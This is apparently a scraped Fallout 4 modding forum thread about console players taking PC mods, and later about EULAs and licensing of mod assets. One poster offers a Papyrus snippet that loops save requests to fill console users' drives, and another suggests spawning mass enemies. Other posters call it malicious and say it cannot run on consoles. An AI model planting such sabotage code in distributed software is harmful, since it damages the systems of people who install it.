DDP MY MODS ARE DOWN, COMMENCE ATTACK ON BETHESDAS MAIN PLATFORM

DDProductions83

damn debug class don't work?, thanks for sharing didn't read it :laugh:

anyway what i wrote above dont break nothing it just shuts down the game.

Shutting the game down would still apply to the malicious bit though. You want to shut down the game, which is not something that is normally expected to happen in normal use of the product. Just saying. Also, no problem. I figured it was about time they were all put in one post. They were a little bit back there by now, so you're probably not the only one that missed it.

• Replies 248
  • Created
  • Last Reply

Top Posters In This Topic

Put this code in your mods as a precaution against mod theft:

If Debug.GetPlatformName() == "PC"
        ; do nothing
    Else
        While Debug.GetPlatformName() != "PC"
            Game.RequestSave()    ; fill their hard drive to capacity
        EndWhile
   EndIf

Problem solved :smile:

Xbox has a limited save system and it will just overwrite saves. Though you can spawn 100k deathclaws with a small tweak to that script.

; do nothing
    Else
        EndWhile
   EndIf

Xbox has a limited save system and it will just overwrite saves. Though you can spawn 100k deathclaws with a small tweak to that script.

Again, that script won't work. Any debug functions like GetPlatformName() will not work on consoles because Bethesda specifically disabled them. No Papyrus code compiled with the "debug" flag will work on consoles.

Edited by Reneer

; do nothing
    Else
        EndWhile
   EndIf

Again, that script won't work. Any debug functions like GetPlatformName() will not work on consoles because Bethesda specifically disabled them. No Papyrus code compiled with the "debug" flag will work on consoles.

And before someone jumps on this as an example of Bethesda "screwing" us, let's all remember that consoles don't HAVE an in-game console the way our PC versions do. All those debugging functions won't do anything on a PS4 version of FO4.

; do nothing
    Else
        EndWhile
   EndIf

In fact this is not only matter of the scripts to f*** consoles but also i know now why some of the users of the Xbox Verstion of the Vbird Overhaul have bugs i can't solve... yea, then i've to find another lovely class to do debug's job q.q

Edited by KataPUMB

Id love to see Bethesda use one of my armors for one of their games. Not only because it would be kind of cool but also because id love to see their laywer trying to defend selling content they didnt have the right to use, that was made by someone with no education in game design at all, using non commercial licenses of programs that are not made by them and dont allow to monetize the products....

Id love to see Bethesda use one of my armors for one of their games. Not only because it would be kind of cool but also because id love to see their laywer trying to defend selling content they didnt have the right to use, that was made by someone with no education in game design at all, using non commercial licenses of programs that are not made by them and dont allow to monetize the products....

Except you grant them all those rights when you upload your mod to Bethesda.net / use the CK. Go read the EULAs if you don't believe me.

Edited by Reneer

Except you grant them all those rights when you upload your mod to Bethesda.net / use the CK. Go read the EULAs if you don't believe me.

I cant grant them any right i dont have, which includes making money of products made with a student version of 3ds max and a non commercial version of Substance painter

I cant grant them any right i dont have, which includes making money of products made with a student version of 3ds max and a non commercial version of Substance painter

This is true. But then again they aren't selling your mod, are they? They've never sold anyone's mod as their own product. And you've highlighted the exact reason they won't do that: they can't guarantee that the mod author used tools that allow for commercialization. That is why they simply use mod authors' ideas instead of a mod author's implementation.

Edited by Reneer